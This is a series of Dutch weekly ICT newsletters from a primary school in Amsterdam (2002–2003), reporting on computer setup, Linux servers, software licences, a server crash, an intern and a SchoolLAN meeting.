De nieuwe computers worden klaargemaakt voor  gebruik. Dat doen we zo:  Ze moeten eerst voorzien worden van een gesplitste harde schijf (c: en d: partitie). Dat doen we met het gratis verkrijgbare Partition Magic of met Fdisk. Dan kijken we welke software er nog bij moet behalve Win 98 SE en M$ Office en anti-VIRUS (we leggen niet meer uit waarom!!). We geven de comp. de juiste IP adressen en netwerkinstellingen en maken de snelkoppelingen naar de fileserver. We passen de zoekpaden aan van 'Mijn Documenten' en van Word, zodat ze naar de fileserver wijzen. We installeren de netwerkprinter van de verdieping waar de computer komt te staan en testen of het werkt.  Daarna maken we met het ook gratis verkrijgbare Drive Image 4.0 een 'image' van de harde schijf en parkeren die op de d: partitie. Als er dan echte ellende komt (computercrash) wissen we de c: schijf en zetten het image terug. Dat is makkelijk en kost maar 10 minuten!!

ICT BELEIDSPLAN/FINANCIEEL OVERZICHT

Wordt hard aan gewerkt. Valt natuurlijk toch weer tegen om te maken.
We hebben de kostenposten in kaart gebracht en weten waar we in 2005 willen zijn. Van daaruit redeneren we terug.

HARDWARE PROBLEMEN

Computer bij Frits. Een voeding kapot. Zoiets hebben we eigenlijk nog nooit meegemaakt. Zo zie je maar dat je met ruim 40 computers in school betrekkelijk weinig echte hardware problemen hebt (afkloppen!!). Omdat de computer toch open was hebben we er meteen maar een snelle netwerkkaart ingezet. Dank Gemeentelijke Dienst!!!

SITES:

rosaboekdrukker.net
Daar staan interessante links. Kijk eens goed. We staan open voor kritiek, suggesties, opmerkingen aanmerkingen, verbeteringen en aanvullingen.

groeten,
Karin
Dirk

2002-11-08 w45

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 45
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ROSABOEKDRUKKER WORDT PILOT

Deze week vond er overleg plaats met Ellen Warmer, beleidsmedewerkster afdeling onderwijs van ons stadsdeel. In dit gesprek hebben we vastgesteld dat wij "Pilotschool" op ICT gebied worden, één en ander in samenwerking met de ICT Academie om op die manier tot een beheerstructuur te komen waarin SchoolLAN de overkoepelende paraplu is. Ook hebben we het plan opgevat om het ABC in de pilot te betrekken op onderwijskundig gebied. Dit alles gaat nu verder uitgezocht worden. Door de actieve medewerking van Ellen wordt ons op deze manier aardig wat werk uit handen genomen.

OPRUIMEN APPARATUUR

De zes nieuwe pentium 1100's worden stuk voor stuk gereed gemaakt voor het vervangen van apparatuur. Er worden computers afgevoerd waarop geen windows 98SE kan, en er worden computers doorgeschoven. Het is veel meer werk dan we hadden gedacht.

ADMINISTRATIE

Door de aanschaf en doorschuif van computers moet ook de administratie worden bijgewerkt. We beschikken over een lijst waarin alle computers staan die we ooit in de school hebben gehad. De laatste in bedrijf zijnde computer heeft het nummer 71 gekregen. Bij Dirk in de kelder staan nog tweedehands computers die geassembleerd moeten worden en a.s. maandag halen we bij een "culturele instantie" afgeschreven computers. Daarover volgende week meer.

LETTERPRET

Eindelijk hebben we het programma Letterpret besteld. Bij de firma Malmberg is bedongen, dat als het niet op de Linux-server wil draaien, we ons contract mogen ontbinden. In de nieuwsgroep nl.onderwijs.nieuwe-media werd dit als een wapenfeit gezien!

LEESLADDER

Het remedië²¥nd leesprogramma de Leesladder doet het op de Linux server. Nu moeten de leerkrachten nog geschoold worden in het gebruik ervan. Daar is een afspraak over gemaakt met het ABC.

DOCUKIT

Dirk heeft deze week het programma Docukit op de Linux server gezet. Dat programma hoort bij de informatie boekjes van De Ruijter. We weten alleen niet of het wel een leuk programma is. Dus de volgende keer, vò²² Dirk zoveel moeite moet doen, zullen we eerst beter onderzoek verrichten. Dirk: "Mwah, wel veel moeite, maar dat komt door mijn gebrek aan kennis en meneer Wolters gebrek aan een goede gebruiksaanwijzing voor installatie onder Linux".

LOPENDE WEBSITE

Vorige week uitgevonden hoe je in het CMS een "lopende" regel moet maken. Eerst alles in html aanvinken en dan de html commando's invoeren. Handig als je thuis kinderen hebt die dat moeten leren op school. En het ziet er spetterend uit. Ideaal voor snelle nieuwtjes.

APS

Een dikke envelop van het APS viel weer op de mat. Het wordt weer tijd om de Microsoft Licenties te verlengen. We komen er voorlopig nog niet onderuit. Het blijft raar, dat als je allemaal legale versies van Micro$of op de desktops hebt staan, je nog geld bij moet betalen (€ 14,25 per computer, per jaar)

groeten,
Karin
Dirk

2002-11-15 w46

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 46
++++++++++++++++++++++++++++++++++++++++++++++++++++++

SCHOOLLAN IN DE BAARSJES

Binnenkort is er op school een informatieve bijeenkomst voor de Corantijn en de Meidoorn. Ze staan voor de keuze met welk systeem ze aan de slag willen. Directie en ICT co?natoren komen bij ons rondkijken en onze ervaringen horen. Welkom!

LEESLADDER

Zwijsen maakt het je niet makkelijk. Het complete programma bestaat uit 4 cd-roms. De installatie duurt uren per CD. Elke keer moet Zwijsen gecontact worden voor een licentie. Op 2 december krijgen we van het ABC instructie hoe ermee om te gaan.

LETTERPRET

Het is besteld! Nog niets ontvangen.

APPARATUUR

Het houdt niet op. We hebben deze week 11 goede gebruikte computers opgehaald bij een Culturele Instelling van de Gemeente Amsterdam. Er zit zelfs een Pentium 300 en twee 17 inch monitoren bij (Trinitron, nieuw en z.g.a.n.). Ze kunnen zo de school in. Ook werden we verblijd met een prachtige nauwelijks gebruikte Laserprinter. Die gaat het kantoor in voor Esis. Dan wordt er weer wat ruimte bespaard, als de hele grote Laserprinter daar weg is. Oude zeer ondermaatse computers worden gesloopt (CD Rom, geheugen, geluidskaart, netwerkkaart, harde schijf er uit) en afgevoerd. De onderdelen worden gebruikt om andere geschonken computers te upgraden. Verder hebben we een tweede switch besteld (een verdeelkast voor het netwerkverkeer) en een harde schijf controller waarmee we onze backups kunnen verbeteren. In vakjargon: hot swap en RAID. Dirk verdiept zich er in.

NASCHOLING

Deze week werd weer gekeken hoe het zoeken op het internet in de bovenbouw gaat. a.s. Maandag hebben we een ICT consult, waarin verder gewerkt wordt aan onze ICT leerlijn.

COMPUTERREGELS

Op onze website is te lezen welke regels we in het team hebben afgesproken over o.a. het gebruik van Internet. Lezen!! Kijken!!

STAGIAIRE!!!

A.s. maandag komt onze eerste ICT stagiaire kennismaken. De stagiaire past in in het ICT concept van SchoolLAN waarbij het ICT beheer op school wordt uitgevoerd door ICT stagiaires. We verheugen ons op de komst van Abdel Bellaoui.

ARABISCHE COMPUTERS

Eindelijk zijn de Arabische toetsenborden binnen. Ziet er prima uit. Veel mooier en schoner dan toetsenborden met plakkertjes etc. Bedankt voor de hulp en de moeite Mohamed!

sites:

http://portal.omroep.nl/?nav=aflfDsHEbHTeBdB Op deze site kun je het Sinterklaasjournaal nog eens bekijken. Op onze schoolsites staan nog veel meer Sinterklaas links. Ook hebben wij het geheime emailadres van Sinterklaas weten te bemachtigen?.. In groep 4a en 4b is post ontvangen.

2002-11-22 w47

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 47
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONZE STAGIAIRE

Deze week is Abdel, stagiaire van de ICT Academie bij ons begonnen. Welkom Abdel! Allereerst een uitgebreide kennismaking, toen hebben we een voorlopig werkschema gemaakt. Op Maandag Windows werkzaamheden. Op Dinsdag Linux werkzaamheden en op Woensdag weten we nog niet wat er dan speelt. Maandag: heeft Joke haar nieuwe computer gekregen en heeft de nieuwe computer van groep 4a een harddisk downgrade gehad zodat we een grote HD over hebben. Dinsdag heeft Abdel zijn eerste Linux server gemaakt. Hoe het ging zal hij jullie een keer vertellen. Woensdag stond in het teken van de servercrash )zie onder)

SOFTWARE: WIG

Er is weer een computer opgedoekt waar WIG op staat. Wat een ramp om de licentie over te zetten. De virusscanner moet eerst helemaal uitgezet worden, anders gaat het niet!!! Hoe onthoud je dat soort dingen, als je 1x per jaar zoiets doet? Nu staat het op de diskette geschreven. Ambrasoft Deze week kwam de nieuwste versie van het programma ?tafels? van Ambrasoft binnen. Deze softwareontwikkelaar heeft de moeite genomen om het programma voor een Linux server geschikt te maken. We zijn benieuwd!

SCHOLING

Afgelopen maandag hebben we ge붡lueerd hoe in de groepen 6 t/m 8 het zoeken op internet t.b.v. het maken van een werkstuk gaat. We doen dit om een ?leerlijn? uit te zetten. Op dit moment is het erg noodzakelijk om voor groep 6 het zoeken in te dammen. We overwegen ook, om in voorbereiding tot het maken van een werkstuk in groep 5 al kleine werkstukjes te laten maken aan de hand van de MINI informatieboekjes met de plusboekjes, maar dan op papier. Ook is het waarschijnlijk beter om de leerlingen eerst te laten omgaan met het zoeken in een digitale kinderencyclopedie. We zijn weer een stukje verder met het invullen van de leerlijn. Het is een genot om te zien hoe leerkrachten hun ervaringen onderling uitwisselen. Ondertussen wordt er steeds meer gebruik gemaakt door kinderen van de computers in de hal om er aan hun werkstuk te werken. Ook wordt de leerlijn in de groepen 3 t/m 5 verder uitgewerkt. Er is nu een voorlopige opeenvolging van tekstverwerkingsvaardigheden.

CRASH FILESERVER

Op Woensdag veroorzaakte Dirk, door eigen stommiteit,  een geweldige crash van de Samba server. Dat is de server waar ALLE bestanden van leerkrachten en leerlingen opstaan. Gelukkig zijn bestanden dubbel gebackupt, dus dat was niet de eerste zorg. Maar niemand kon meer werken. Gelukkig was het Woensdag, dus speelde het probleem maar een paar uur. Dezelfde dag heeft Dirk de server geprobeerd te repareren. Toen dat niet lukte heeft ie  rond  22.00 's avonds besloten de server opnieuw te installeren. Donderdagochtend rond 03.00 uur was dat klusje klaar en draaide de boel weer. De wijze les die we al wisten: als je niet zoveel verstand hebt van Linux, speel dan op zeker. Vandaar die backups. Wijze lessen die we met harde hand geleerd hebben: - Als de server voor je werkt, moet ie wel zijn klusje kunnen afmaken. Als de klus heel groot is, duurt dat lang. Dirk greep te snel in door ongeduld en molde de boel. - Maak regelmatig backups van de configuratiebestanden van de server. Dirk had veel extra werk omdat ie dat niet goed had bijgehouden. - Alle wijze lessen bestaan uit drie: de derde les moet nog getrokken worden.

SWITCH

De switch  (verdeelkast voor netwerkaansluitingen) is aangekomen en zal door Abdel ge﮳talleerd worden. Mooie klus!

HOT SWAP CONTROLLER

Is ook binnen, maar die wil Dirk lekker zelf installeren. Zo'n lekker leerhapje laat ie zich niet ontglippen!

Dat was het weer voor deze week.

groeten,
Karin
Dirk

2002-11-29 w48

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 48
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BESTANDENSERVER NOG NIET GOED

We denken dat het een hardware probleem is. Dus we hebben een spiksplinternieuwe computer uit een klaslokaal gehaald. Die is nu de voorlopige server. We gaan z.s.m. een nieuwe server kopen. Door de back-ups zijn we nog redelijk ?up to date?. Er is wel wat materiaal verloren gegaan, maar niet zo veel. Afgelopen vrijdag is er nog een goede back-up vastgelegd.

WERKBRIEFJES

Abdel werkt nu met werkbriefjes. Daarop staan zijn klussen.

Hij heeft deze week o.a. een harde schijf in twee partities ingedeeld, virusscanners ge﮳talleerd, hand en span diensten verricht. b.v. Er was een computer die verkeerde leestekens gaf. En dan moet je in configuratiescherm>toetsenbord>taal  de goede instelling geven. Maar ja, één van de ondergetekenden denkt: nederlands. Maar het moest amerikaans zijn. Dan werken de toetsen goed. Weer wat geleerd.

SOFTWARE

Ik-reken
We blijken niet de netwerkversie te hebben, vandaar onze problemen met het 'aan de praat' krijgen. Netwerkversie voor € 25.- omgeruild. Is onderweg

Leesladder
Het werkt!!! Hij doet het op de Linux server!! Maandag as. gaan we met een groepje leerkrachten naar het ABC om te leren met het programma om te gaan.

Letterpret.
Op donderdag 28 november 2002 gearriveerd. Ook een zak met 37 erbijbehorende buttons. Elk kind zijn eigen ?logootje?. Maar hoe komen ze nou op het getal 37? We hebben veel meer kinderen die in aanmerking komen om met het programma te werken.

ANTI VIRUS

Op de servers hebben we anti-virus software van het gratis programma F-prot. Elke nacht wordt gekeken of  er updates zijn en worden de servers gescand. Bij gevonden virussen wordt een mail verstuurd. En op de werkstations werken we met Norton , want via internet en floppies zijn er ook gevaren te duchten.

SCHOOLLAN

Op dinsdag 10 december (aanvang 09.00 uur) is onze mini-conferentie over Linux op school en SchoolLAN. Het aantal aanmeldingen overtreft onze stoutste verwachtingen. Van alle gemailde personen (134) kunnen er 14 niet!!

Dat wordt dringen! Zorg dat je op tijd bent voor een goede plaats.

ALTIJD OP TIJD

Dirk heeft een programma op de servers ge﮳talleerd waardoor ze altijd de juiste tijd hebben. Dat is makkelijk, want als we nu met een Windows computer op de bestandenserver inloggen, krijgt de Windows computer automatisch de juiste tijd. De tijd wordt iedere nacht om 04.00 uur opgehaald van een tijdserver die is verbonden met een atoomklok in Duitsland.

PS: dit kun je thuis ook installeren. Vraag maar op maandagmiddag tijdens het spreekuur van de afdeling ICT.

WEBSITE EN CMS

Er wordt nog steeds gewerkt aan verbetering van de website en het CMS. Er is een vernieuwde versie van het CMS bijna klaar.

Het is heel leuk om aan de website te werken. Het kan gewoon thuis. Het gaat heel vlug.

SITES

Er kwam deze week een brochure van de vernieuwde website van Kennisnet. Daarin wordt verteld, dat je als leerkracht veel hebt aan de ?communities? van de digitale basisschool.

Neem een kijkje. Vorm een mening. Neem deel aan een forum. Kijk wat ?wij? er te melden hadden?.

http://www.digischool.nl/po/ds/dbs/jufmees/jmdx.htm

SINTERKLAAS

De Sinterklaas email wordt flink gebruikt door de groepen 3 en 4. Sint heeft het er maar druk mee, maar vindt de tijd om voor ieder kind een persoonlijk woordje te hebben.

LINKS

rosaboekdrukker.net. Klik op de Sint op de startpagina!

Voor Sint ideeën; kijk bij leerkrachten.

2002-12-06 w49

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 49
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BESTANDENSERVER

Een nieuwe computer is nu de tijdelijke bestandenserver en alles loopt nu weer als een zonnetje. Dirk heeft er griep van gekregen. We hebben een nieuwe server besteld. Het is een P4, 2GHZ, 768 MB RAM, 2 x 80 GB HD met Hot Swap on the Fly. Deze configuratie is overdreven zwaar voor een fileserver voor de ll, we weten het, maar het ding gaat de toekomstige ESIS server worden als de setup bevalt. Zo doen we wat ervaring op. Het ding kost ongeveer 1500 EUR. Ook denken we dat 't als SchoolLAN server een prima ding zou kunnen zijn.

STAGIAIRE

Het blijft nog wennen, een stagiaire. Vooral het geven van opdrachten. Deze week heeft hij de virusscanner op alle Win98's gezet. Moeten nog kleinigheden aan gebeuren. Verder heeft hij de gekregen laserprinter onderzocht. Er is wat mis mee waardoor deze niet inzetbaar is. Dirk kijkt er nog een keer naar voor de zekerheid.

SOFTWARE

We hebben met een groepje leerkrachten op het ABC geoefend met het omgaan met het programma Leesladder. Dat is een remedië²¥nd leesprogramma. Niet bedoeld voor alle leerlingen, alleen voor de kinderen met problemen. Het is nog even wennen. Het programma moet het niveau van het kind bepalen. Alles wat het kind doet wordt geregistreerd. Het is een behoorlijk duur programma.

SCHOOLLAN

Op dinsdag 10 december (aanvang 09.00 uur) is onze mini-conferentie over Linux op school en SchoolLAN. Er melden zich mensen om te komen, ook uit Linux-hoeken.

SITES

Wederom van onze eigen rosaboekdrukker.net http://rosaboekdrukker.net/index.php?page=218&section=10 Op deze link staat informatie 'uit het veld' over het Nationaal Kerstkado. Alle onderwijzers in Nederland worden verrast met een kaartje voor een voorstelling met nog wat 'open plekken'. Van die plaatsen net achter een zuil. Niks kiezen. Lees. Wie heeft er trouwens al wat van gehoord??

Kijk ook op de pagina leerkrachten voor de nieuwste informatie uit het praxis bulletin.

Groep 3 heeft de meest fantastische paint-werkstukken over Sinterklaas gemaakt. Na dit weekend moeten ze plaats maken voor de kerst. Jammer.

2002-12-13 w50

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 50
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze BIC staat geheel in het teken van onze mini-confentie. Daarom een passend citaat. Het is van Roger Schawinski, bestuurder van een lokaal radiostation in Zwitserland. Zijn woorden over lokale radio zijn ook van toepassing op servers en ICT op School.

"Als de zender werkt, heb je tienduizend problemen. Als de zender niet werkt, heb je er maar één."

Verslag bijeenkomst over 'Netwerk op school' op Dinsdag van 9.00 tot 12.00 uur.

De bijeenkomst, op verzoek van de Corantijn en de Meidoorn georganiseerd, was om uitleg te geven over Linux, SchoolLAN, ons netwerk en ons ICT beleid. De Meidoorn was niet aanwezig wegens ziekte van de directeur en had ook geen vervanger gestuurd. Gelukkig was de Corantijn met een grote delegatie aanwezig. Ook aanwezig was Sheila Hulsthoff vanuit de Baarsjes en Bas Smits van de Mrg. Bekkerschool (waarover later meer).

Er werden drie korte inleidingen gehouden:

1. Dirk vertelde over Linux op de OBSRB en waar we het zoal voor inzetten: Internet delen, router, firewall, mailserver, interne- en externe webserver, bestandenserver. Alles wordt door middel van eigen onderzoek uitgevoerd en opgezet. Dat is een hoop werk en het kost dus veel tijd (en soms gaan er dingen fout), waardoor de indruk is ontstaan dat 'wat jullie doen alleen mogelijk is omdat Dirk bij jullie rondloopt'. Deze mythe werd ontzenuwd. Voor Dirk is Linux in het onderwijs een leerproject. De OBSRB is een ideale ICT proeftuin die hem de gelegenheid biedt Linux te leren en een die de school een extra ICT medewerker oplevert.
Het betekent helaas ook dat de situatie op de OBSRB niet model kan staan voor wat met ICT en Linux op basisscholen mogelijk is. Daarom zijn we wegen gaan zoeken om Dirk 'overbodig' te maken. Dat kan door je aan te sluiten bij een goed initiatief dat tegelijk een stevig  organisatorisch kader biedt voor ICT op school, te weten SchoolLAN. De ervaringen die wij uit het veld horen over SchoolLAN steunen ons in de gedachte dat het een goede keus is voor een basisschool. Omdat SchoolLAN zwaar leunt op inzet van ICT stagiaires voor beheer op afstand en beheer op school moet deze poot eerst ontwikkeld zijn, wil een gezonde en 'Dirkvrije' overstap mogelijk zijn.  De Baarsjes ziet de OBSRB in dit verband als proefproject en steunt ons actief in onze aanpak.

De tweede inleiding was van Bas Smits, leerkracht op de Mrg. Bekkersschool in Amsterdam Noord.
Zijn verhaal was het tegendeel van dat van Dirk. De Linux server is samengesteld door een groep ICT studenten in het kader van een afstudeerproject. De server dient als router, firewall, webserver en bestandenserver. De server is aangesloten op Kennisnet. Bas besteedt in het geheel geen tijd of aandacht aan de server. Het ding doet het altijd en heeft uptimes (de tijd dat een systeem zonder storingen draait en niet hoeft te worden afgezet voor onderhoud e.d.) van vele maanden. De stroomstoring die A'dam Noord onlangs trof was de eerste downtime in een jaar. De server draaide na de storing gewoon verder.
Op de Mrg. Bekkersschool zijn de computers in de klas uitgerust met Linux en Windows. De leerlingen werken net zo makkelijk op Linux als op Windows.

De derde inleider was Karin Abma, ICT coordinator op de OBSRB.
Zij benadrukte dat al die technische dingen (netwerk, server) niet belangrijk zijn. De knelpunten ontstaan pas als de zaak goed werkt. Dan pas ontstaan vragen en problemen die van tevoren niet te voorzien zijn en ook niet in beleidsstukken vooraf zijn te formuleren. Bijvoorbeeld: Hoe ga je onderwijsinhoudelijk ICT inzetten? Tegen welke belemmerende factoren loop je op?  Hoe begeleid je leerkrachten op het soms kronkelige ICT pad? Wat is goede software in jouw school? Hoe zet je die software het effectiefst in? Wat is ons internet beleid en hoe pakken we 't organisatorisch zo aan dat het geen papieren tijger is? Deze en vele andere ervaringslessen brachten haar en anderen tot de conclusie dat, wil je ICT ?upt integreren in het onderwijs op je school, een ICT co?nator voldoende tijd tot zijn/haar beschikking moet hebben om e.e.a. te kunnen ontwikkelen en uitbouwen. Is dit niet het geval, dan kun je beter bordkrijt kopen i.p.v. een netwerk en een server en een aantal werkstations.

Na deze drie korte inleidingen ontspon zich een levendig en vruchtbaar gesprek. Enkele zaken die over tafel gingen: - Waar besteed je je tijd aan als ICT coördinator?
- Als je stagiaires van een ICT Academie hebt, wie begeleidt ze dan? Enige verwarring bij Sheila n.a.v. opmerkingen van Karin en Dirk die Hans Frazer citeerden: "Voor een stagebegeleider is waarschijnlijk wel een pot".
- Wat moeten we voor computers kopen? Korte samenvatting van suggestie: wacht er even mee totdat een paar andere problemen op de Corantijn zijn opgelost. Als je die computers vandaag bestelt staan ze met een week in huis. Maar als je Internetverbinding nog steeds niet werkt, heb je te weinig aan die net gekochte computers. Dat vermindert het enthousiasme.
- Hebben we wel de juiste verbindingen tussen Kennisnet en onze patchkast?
- Etc.

Wat verder ter tafel kwam was de wens van de OBSRB om bij één van de scholen een lokaal te kunnen gebruiken als 'computerwerkplaats'. We hebben veel computers gekregen die door onze stagiaire bruikbaar gemaakt kunnen worden. Wie heeft daar ruimte voor? Graag snel reageren!!

Besloten werd om SchoolLAN, in de persoon van Ruud Suk, uit te nodigen om de vele vragen rond het systeem te beantwoorden. Op DINSDAG 14 JANUARI, om 10.00 uur komt Ruud naar ons toe (de OBSRB) om voorlichting te geven. Daarvoor is echter wel voorbereiding van onze kant nodig. Willen jullie al je vragen opsturen aan Ruud ( ruud@stichting.schoollan.nl ) zodat hij zich daarop kan voorbereiden. Voor het welslagen van de bijeenkomst is dit van het grootste belang !!!!

Tot zover dit verslag en deze BIC. Omdat het verslag al zo groot is hebben we deze week geen links, etc.

Goed weekend,
Karin,
Dirk

2002-12-20 w51

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 51 - 2002
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week geen uitgebreide nieuwsbrief. Maar wel leuk nieuws.

COSAWARD 2002 voor Dirk

In alle stilte hadden we Dirk voorgedragen voor de Cosaward: ICT inspirator 2002.
Die ICT stimuleringsprijs is ooit verzonnen door het ministerie van OC&W, maar nu overgegaan in een stichting met sponsors enzo. Vanaf de zomervakantie tot en met de herfstvakantie is er gewerkt aan de ?aanbeveling?. Intern is ook alles heel geheim gehouden. We zouden Dirk eens verrassen. Nooit wil hij een cent beloning, dus dan maar het op een andere manier proberen. En het is gelukt: hij heeft de prijs gewonnen! Nu moesten we hem nog naar de uitreiking zien te lokken. Allerlei snode plannen. Ook de organisatie zou meehelpen het geheim te houden. Maar die organisatie bestaat uit teveel schijven en Dirk werd gebeld door iemand die hem wilde portretteren. Enfin. Hij had lont geroken, ook al was er gezegd, dat het slechts om een nominatie ging.
Hij gebruikte de voorkennis om een speech voor te bereiden??
Terwijl de vertegenwoordiger van de hoofdsponsor (een grote software leverancier) in de zaal zat, hing Dirk een kleerhangertje met een PINGUÏN (Linux logo) op aan het katheder!! In het publiek brak een ovatie los.
Voor niet ingewijden: in onderwijsland bestaat er een verschil tussen meedoen met de grote bedrijven (duur) en proberen op basis van Linux (goedkoop) voor het onderwijs je school in een netwerk te hangen. De hoofdsponsor heeft nog steeds een hele grote vinger in de pap. Spannende tijden, omdat steeds meer geluiden opgaan voor het gebruik van Open Source Software (o.a. Linux).

We zijn heel trots, dat Dirk de prijs heeft gewonnen. Binnenkort verschijnt een nieuw nummer van COS, het tijdschrift van Computers in het Onderwijs, met een portret over Dirk.
Er valt ook wat (beetje slap verhaaltje, waar je weinig uit op kunt maken) te lezen op de site www.cosawards.nl.
Ook de site www.ictopschool.net  heeft er aandacht aan besteed. En natuurlijk valt alles na te lezen op onze eigen site: rosaboekdrukker.net (onder ICT)

Dirk heeft natuurlijk meteen nieuwe plannen met het geld dat hij heeft gewonnen. Hij koopt er geen Batmobile van. Het wordt een IT project. Heel geheim nog??..

Ontvangers van deze nieuwsbrief:
Wij wensen jullie allen een vrolijk kerstfeest en een gelukkig 2003.
Wij danken jullie hartelijk voor alle goede bijdragen hulp, steun, die van alle kanten aan ons zijn gegeven.

Namens Dirk en de directie van de Rosa Boekdrukker,
groeten,
Karin

2003-01-10 w02

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 2 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Een voorspoedig en gezond ICT jaar 2003!

BEGIN

We begonnen het schooljaar met het terugzetten van vele computers. Die hadden in de kerstvakantie het veld moeten ruimen voor de verbouwers. John heeft er nog flink aan moeten sjouwen. Er komen vier lokalen bovenop ons gebouw. En daar zit ook een flinke hal bij, misschien wel voor nog meer computers. Daarna heeft Abdel, onze stagiaire alle computers nagelopen om te kijken of ons antivirussysteem de nieuwe virusdefinities ophaalde.

SCHOOLLAN

NIET VERGETEN JE VRAGEN OP TE STUREN AAN RUUD SUK VOOR DE BIJEENKOMST A.S. DINSDAG om 10.15 uur (ruud@stichting.schoollan.nl)

NASCHOLING

Afgelopen dinsdag begonnen we het ICT jaar goed met een ICT bijeenkomst voor de leerkrachten van de groepen 6 t/m 8. We zijn weer verder gegaan met het uitzetten van de leerlijn voor de betreffende groepen voor het maken van werkstukken met behulp van het internet. We hebben een nieuwe begeleider van het ABC, Guus Aalders. Hij komt van het GCO-Friesl® (GCO frysl® is hé´ centrum voor educatieve dienstverlening in Noord-Nederland.) De bedoeling is, dat met behulp van deze scholing voor elk leerjaar komt vast te staan wat er op ICT gebied geleerd en gedaan moet worden door de leerlingen.

DRO

Aanstaande maandag is er weer een DRO bijeenkomst op school voor die leerkrachten die daar wat aan willen doen, vrijwillig dus. We zijn met een groepje van ongeveer 10 leerkrachten.

UPS

In de kerstvakantie is er weer het nodige gedaan. Na een paar stroomstoringen en het vermoeden dat dat een slecht functionerende computer tot gevolg had, hebben we een UPS (Uninterrupted Power Supply) gekocht. Als nu de stroom uitvalt, draaien de servers nog een paar minuten door en worden dan netjes afgesloten. En Dirk ontvangt een mail dat de boel is gestopt. We hebben uiteraard nu ook de switches en routers op het UPS aangesloten (bedankt voor de tip Peter!!). Het UPS en de bijbehorende software zijn van Fenton en geschikt voor 'alle' besturingssystemen.

NETWERKKABELS

In het serverhok was het zo langzamerhand een ratjetoe van netsnoeren en verdeelcontactdozen. Dat is in de Kerstvakantie ook aangepakt. Het ziet er nu weer toonbaar uit.

BACKUP SERVER

We willen een systeem om simpel de Windows computers te kunnen backuppen. Dirk vond: http://www.feyrer.de/g4u/ . Ofwel Ghost for Unix voor de kenners onder U. FF bekijku want het werkt voor ieder operating system! We hebben 't getest en het werkt als een ZONNETJE!! Dit systeem gaat ons ongelofelik veel sores uit handen nemen.

VENTILATIE

Met al die servers wordt het langzamerhand wel iets warmer in het hok. John heeft een randje van 5 centimeter van de deur afgezaagd zodat we iets meer doorstroming van lucht krijgen.

VIRUS

We hebben het YAHAA.K virus in twee computers gehad. Vermoedelijk omdat iemand (wie o WIE?) met hotmail een attachment heeft geopend en de virusscanner niet reageerde (of was afgezet). Het virus heeft twee computers zo aangetast dat we van 't weekend bij één de harddisk formatteren en een nieuw Windows 98 SE systeem erop zetten. De andere computer wordt daarna gekloond.( bij computers mag dat) ADVIES: Open geen bijlagen waar je niet om gevraagd hebt of van mensen die je niet kent! Het YAHAA virus is gevaarlijk!

MALMBERG

Dirk worstelt met uitgeverij Malmberg. Na twee keer een nieuwe registratie floppy te hebben gekregen blijkt nu waarschijnlijk de CD fout te zijn. We krijgen zo langzamerhand een sik van die Malmberg (letterpret). Dit speelt allemaal al sinds november. En we hadden er al eentje (sik) van Zwijsen en hun licentiecodes. BAH!

Prettig weekend,
Karin
Dirk

2003-01-17 w03

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker Jaargang 2 - week 3 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Er is weer veel gebeurd op ICT gebied deze week op de Rosa Boekdrukker!
In deze nieuwsbrief zijn hyperlinks toegevoegd. Als jullie problemen hebben met het ontvangen van deze mail, meld het dan, s.v.p.

DRO

Op maandag was er weer een vrijwillige scholing voor leerkrachten voor de eigen vaardigheden. We hebben zitten ploeteren op tabellen, alinea?s, opsommingtekens in verschillende niveaus en het euroteken.

SCHOOLLAN BIJEENKOMST

Afgelopen dinsdag was er een bijeenkomst bij ons op school waarin Ruud Suk van de Stichting Schoollan kwam uitleggen wat Schoollan allemaal inhoudt. Aanwezig waren vertegenwoordigers van de Corantijn, de Meidoorn, de Mgr. Bekkersschool en het stadsdeel. Afgesproken is, dat we aan het eind van deze maand nog eens bij elkaar proberen te komen met een klein clubje en het ABC (schoolbegeleidingsdienst) erbij. Nadere berichten volgen.

Wij waren razend enthousiast toen we hoorden wat de configuratie van de Schoollan cd allemaal inhoudt en hoe het team van de Schoollan techneuten weet om te gaan met de sleutels van de educatieve software.

Wij hebben er zin in!

EVALUATIE MIDDAG ICT SCHOLING

Op donderdagmiddag was de school gesloten voor de leerlingen. De leerkrachten moesten allemaal present zijn, ook de mensen die op donderdag niet werken. Volle bak dus bij het evalueren van de ICT-scholing die we tot nu toe dit schooljaar gevolgd hebben. De drie bouwen moesten in 40 minuten een power-point presentatie maken waarin werd uitgelegd wat er de afgelopen maanden gedaan is, wat gelukt is en waar de knelpunten liggen.

De grootste knelpunten liggen vanaf groep 3 in de organisatie en de tijd. Vast staat wel, dat een leerlijn zichtbaar wordt en dat die knelpunten zullen afnemen als in kleine porties de tekstverwerkingstechnieken per leerjaar zullen worden aangeboden. We zijn op de goede weg.

STAGIAIRE

Deze week was Abdel voor het laatst bij ons. A.s. Maandagochtend komt hij nog op school om wat administratieve zaken af te handelen.

NETWERK STAND VAN ZAKEN

We deden een oproep voor hulp in de Linux groep omdat Dirk tegen problemen aanloopt waar hij niet meer uitkomt. Vier mensen reageerden. Twee daarvan (uit A'dam Noord en Bussum) heeft Dirk doorverwezen naar de Mgr. Bekkersschool in A'dam Noord (naar Bas) en naar de Emmaschool in Bussum (Peter). Iedereen blij.

